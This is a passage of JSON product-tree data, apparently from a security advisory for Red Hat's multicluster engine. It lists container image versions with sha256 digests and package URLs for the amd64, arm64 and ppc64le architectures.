"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"product_id": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"product_identification_helper": {
"purl": "pkg:oci/multicloud-manager-rhel9@sha256%3A31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775441898"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"product_id": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"product_identification_helper": {
"purl": "pkg:oci/placement-rhel9@sha256%3A32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775638675"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"product_id": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/provider-credential-controller-rhel9@sha256%3Afd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775231857"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"product_id": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"product_identification_helper": {
"purl": "pkg:oci/registration-rhel9@sha256%3A548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775638726"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"product_id": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"product_identification_helper": {
"purl": "pkg:oci/registration-operator-rhel9@sha256%3A2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775638748"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"product": {
"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"product_id": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/work-rhel9@sha256%3A08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a?arch=amd64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775638726"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"product_id": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/addon-manager-rhel9@sha256%3Ab0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775638648"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"product_id": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel9@sha256%3A45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774990481"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"product_id": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"product_identification_helper": {
"purl": "pkg:oci/backplane-rhel9-operator@sha256%3A6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775518980"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"product_id": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-api-provider-agent-rhel9@sha256%3Aa368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775346065"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"product_id": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-api-provider-kubevirt-rhel9@sha256%3A98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913637"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"product_id": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-curator-controller-rhel9@sha256%3A89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913604"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"product_id": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-image-set-controller-rhel9@sha256%3Aad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913615"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"product_id": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-proxy-addon-rhel9@sha256%3A3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913693"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"product_id": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-proxy-rhel9@sha256%3Aac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775441905"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"product_id": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/clusterclaims-controller-rhel9@sha256%3Ab496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774918593"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"product_id": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/clusterlifecycle-state-metrics-rhel9@sha256%3A36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774925022"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"product_id": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"product_identification_helper": {
"purl": "pkg:oci/console-mce-rhel9@sha256%3A7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775116156"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"product_id": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"product_identification_helper": {
"purl": "pkg:oci/discovery-rhel9@sha256%3Ad7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913711"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"product_id": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"product_identification_helper": {
"purl": "pkg:oci/hive-rhel9@sha256%3Ac02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775259683"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"product_id": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"product_identification_helper": {
"purl": "pkg:oci/hypershift-addon-rhel9-operator@sha256%3Afff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913832"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"product_id": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/hypershift-cli-rhel9@sha256%3A4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913767"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"product_id": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/hypershift-rhel9-operator@sha256%3A1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913854"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"product_id": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/image-based-install-rhel9@sha256%3Ae227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774986989"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"product_id": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kube-rbac-proxy-mce-rhel9@sha256%3A62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913844"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"product_id": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"product_identification_helper": {
"purl": "pkg:oci/managed-serviceaccount-rhel9@sha256%3Af1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775441911"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"product_id": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/managedcluster-import-controller-rhel9@sha256%3A11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775198475"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"product_id": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"product_identification_helper": {
"purl": "pkg:oci/multicloud-manager-rhel9@sha256%3A5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775441898"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"product_id": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"product_identification_helper": {
"purl": "pkg:oci/placement-rhel9@sha256%3Ac0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775638675"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"product_id": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/provider-credential-controller-rhel9@sha256%3A24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775231857"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"product_id": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/registration-rhel9@sha256%3A126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775638726"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"product_id": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/registration-operator-rhel9@sha256%3Ab98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775638748"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"product": {
"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"product_id": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"product_identification_helper": {
"purl": "pkg:oci/work-rhel9@sha256%3A4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53?arch=arm64\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775638726"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/addon-manager-rhel9@sha256%3Af6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775638648"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel9@sha256%3A9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774990481"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"product": {
"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"product_id": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/backplane-rhel9-operator@sha256%3A5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33?arch=ppc64le\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775518980"
}
}
},
{
"category": "product_version",
